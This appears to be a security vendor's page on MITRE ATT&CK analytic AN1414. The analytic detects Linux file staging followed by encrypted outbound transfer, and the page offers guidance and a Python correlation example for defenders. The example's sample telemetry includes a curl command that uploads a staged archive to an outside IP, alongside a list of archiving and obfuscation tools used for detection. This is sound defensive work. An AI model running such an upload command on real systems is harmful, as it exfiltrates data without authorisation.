MITRE ATT&CK® Analytic

AN1414: Analytic 1414

Detects staged file access (e.g., archive or obfuscation), followed by an encrypted outbound connection (TLS/HTTPS) from unusual processes such as curl/wget, Python scripts, or custom binaries.

Domain: Enterprise | ID: AN1414 | Type: Analytic | Object version: 1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN1414 is a Linux-focused detection analytic for a suspicious sequence: files appear to be staged or prepared, such as through archiving or obfuscation, and then an encrypted outbound TLS/HTTPS connection is made by an unusual process such as curl, wget, a Python script, or a custom binary. For leaders, the value is not the individual use of HTTPS or command-line tools—both can be normal—but whether the organization can recognize when file preparation and outbound transfer behavior combine into a potential data movement pattern.

Executive priority

Prioritize this analytic as a validation point for Linux server monitoring, SOC triage quality, and incident response readiness. It helps answer whether teams can produce evidence around suspicious outbound activity from servers or workloads, especially when encrypted traffic limits content inspection. The business decision is whether existing logging, egress controls, and alert review processes can distinguish routine administrative automation from potentially unauthorized file staging and outbound transfer.

Technical view

SOC and detection teams should validate correlation between Linux file staging indicators and outbound TLS/HTTPS connections from processes such as curl, wget, Python interpreters, or unfamiliar binaries. Because no official detection logic is provided, teams should define local baselines for expected automation, backup jobs, package managers, deployment tooling, and administrative scripts. Investigations should focus on process lineage, command-line context, file paths touched before connection, destination reputation or novelty, user/service account context, and whether the process is expected on that host.

Likely telemetry

  • Linux process execution telemetry, including process name, command line, parent process, user, and working directory
  • File access or file creation telemetry for archives, packed files, staged directories, or recently modified collections of files
  • Network connection metadata for outbound TLS/HTTPS sessions, including destination IP/domain, port, process attribution where available, and timing
  • Host inventory or allowlist context for expected curl, wget, Python, and custom binary usage
  • Authentication or session context for the user or service account that launched the process

Detection direction

  • Correlate staged file access followed closely by outbound encrypted connections rather than alerting on curl, wget, Python, or HTTPS in isolation.
  • Tune against known-good Linux automation such as backups, software updates, configuration management, CI/CD tasks, and approved administrative scripts.
  • Prioritize unusual parent-child process chains, rare binaries, rare destinations, first-seen outbound domains, unexpected working directories, and activity from sensitive servers.
  • Account for blind spots where network telemetry lacks process attribution, where TLS content is not inspected, or where Linux file auditing is limited.
  • Because ATT&CK provides no official detection logic or tactic mapping for this object, treat AN1414 as a detection design pattern that requires local thresholding and validation.
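The correlation described in the Technical view and Detection direction sections, as an added example that is not MITRE's or Glexia's code: it pairs execution of archiving or obfuscation tools with a later outbound TLS connection by the same host and user, suppresses locally allowlisted automation, and carries process lineage, command lines, and destination into the alert. The event field names, the allowlist, and the sample telemetry are constructed assumptions for this example.

```python
from collections import defaultdict

# Tools whose execution is treated as possible file staging (archive or obfuscation).
STAGING_TOOLS = {"tar", "zip", "gzip", "xz", "7z", "base64", "openssl", "gpg"}
TLS_PORTS = {443, 8443}
WINDOW_SECONDS = 300  # staging must precede the TLS connection by at most this much
# Local baseline of (image, parent) pairs expected to make outbound TLS connections.
# Constructed for this example; a real deployment derives it from its own automation.
ALLOWED_EGRESS = {("curl", "cron"), ("python3", "systemd")}

# Constructed, already-normalised Linux telemetry: one dict per process or network event.
SAMPLE_EVENTS = [
    {"type": "process", "ts": 1000, "host": "web01", "user": "alice", "image": "tar",
     "parent": "bash", "cmdline": "tar czf /tmp/.cache/rep.tgz /srv/reports"},
    {"type": "network", "ts": 1120, "host": "web01", "user": "alice", "image": "curl",
     "parent": "bash", "cmdline": "curl -s -T /tmp/.cache/rep.tgz https://203.0.113.10/u",
     "dst": "203.0.113.10", "dport": 443},
    # Nightly backup: same tool chain, but launched by cron and on the egress allowlist.
    {"type": "process", "ts": 2000, "host": "web01", "user": "root", "image": "tar",
     "parent": "cron", "cmdline": "tar czf /var/backups/etc.tgz /etc"},
    {"type": "network", "ts": 2050, "host": "web01", "user": "root", "image": "curl",
     "parent": "cron", "cmdline": "curl -T /var/backups/etc.tgz https://backup.internal/",
     "dst": "10.20.0.5", "dport": 443},
    # HTTPS from python3 with no preceding staging: TLS in isolation is not alerted on.
    {"type": "network", "ts": 3000, "host": "db01", "user": "bob", "image": "python3",
     "parent": "bash", "cmdline": "python3 healthcheck.py", "dst": "198.51.100.7", "dport": 443},
]

def correlate(events, window=WINDOW_SECONDS, allowlist=ALLOWED_EGRESS):
    """Pair each non-allowlisted outbound TLS connection with staging activity by the same
    host and user within `window` seconds before it; return one alert per match."""
    staged = defaultdict(list)  # (host, user) -> staging process events seen so far
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        key = (ev["host"], ev["user"])
        if ev["type"] == "process" and ev["image"] in STAGING_TOOLS:
            staged[key].append(ev)
        elif ev["type"] == "network" and ev["dport"] in TLS_PORTS:
            if (ev["image"], ev["parent"]) in allowlist:
                continue  # expected automation: tuned out rather than alerted
            prior = [s for s in staged[key] if 0 <= ev["ts"] - s["ts"] <= window]
            if prior:
                alerts.append({
                    "host": ev["host"], "user": ev["user"], "lineage": f"{ev['parent']} -> {ev['image']}",
                    "staging_cmdlines": [s["cmdline"] for s in prior], "egress_cmdline": ev["cmdline"],
                    "destination": f"{ev['dst']}:{ev['dport']}", "delay_seconds": ev["ts"] - prior[-1]["ts"],
                })
    return alerts
```

Running `correlate(SAMPLE_EVENTS)` yields a single alert for the alice/web01 chain; passing an empty allowlist also surfaces the cron backup, which shows why local baselining is part of the detection rather than an afterthought.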

Mitigation priorities

  • Establish Linux logging coverage for process execution, file activity, and outbound network metadata before relying on this analytic.
  • Define and maintain approved administrative and automation patterns for curl, wget, Python, and custom binaries on Linux systems.
  • Use egress governance to limit outbound destinations and require review for unusual server-to-Internet connections where operationally feasible.
  • Document incident response playbooks for suspected file staging and encrypted outbound transfer, including host isolation criteria and evidence preservation.
  • Review coverage as part of compliance and audit readiness where evidence of monitoring, egress control, and investigation handling is required.

Analyst notes and limits

This object is a detection analytic, not a technique or procedure, and no relationship context was supplied. The strongest use is as a practical validation exercise: can defenders connect Linux file staging behavior to encrypted outbound network activity by unusual or locally rare processes? Local baselining is essential because many listed tools have legitimate administrative uses.

The supplied ATT&CK fields do not include official detection logic, tactics, related techniques, data sources, mitigations, attribution, or evidence of active exploitation. Conclusions are limited to the Linux platform and the behavior described in the official description.

Official MITRE ATT&CK definition

Analytic 1414

Detects staged file access (e.g., archive or obfuscation), followed by an encrypted outbound connection (TLS/HTTPS) from unusual processes such as curl/wget, Python scripts, or custom binaries.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: ef01c4f1a28aaade...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status         | Raw hash
19.1    |                 | 1.0            |          | Current bundle | ef01c4f1a28a…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: AN1414

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.